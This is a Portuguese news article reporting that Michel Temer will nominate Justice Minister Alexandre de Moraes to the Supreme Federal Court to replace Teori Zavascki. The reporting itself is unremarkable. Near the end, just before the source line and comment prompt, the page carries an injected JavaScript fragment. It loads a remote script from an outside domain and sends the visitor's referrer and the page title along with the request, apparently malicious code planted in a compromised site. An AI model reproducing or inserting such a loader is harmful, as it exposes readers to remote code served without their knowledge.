Alexandre de Moraes será indicado para o STF

O presidente Michel Temer vai indicar o atual ministro da Justiça, Alexandre de Moraes (PSDB), para ocupar a vaga de ministro no Supremo Tribunal Federal (STF). A informação foi dada por Vera Magalhães, do Estadão.

A decisão foi comunicada por telefone aos aliados no fim de semana. Moraes vai assumir a vaga deixada por Teori Zavascki, que morreu no dia 19 de janeiro em acidente aéreo.

O tucano cancelou uma agenda em São Paulo na manhã desta segunda-feira (6), onde participaria da posse de novos integrantes do Tribunal de Contas do Estado de São Paulo. Entretanto, o ministro veio para Brasília e seguiu para o Palácio do Planalto.

 

A escolha por um nome mais político do que técnico aliado deve desgastar o governo Temer, segundo especialistas. Com a saída de Moraes do alto escalão do presidente, a pasta deverá ser ocupada pelo PMDB.

Na semana passada, o STF definiu por sorteio que o encarregado de substituir Teori na relatoria da Lava Jato é o ministro Fachin.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário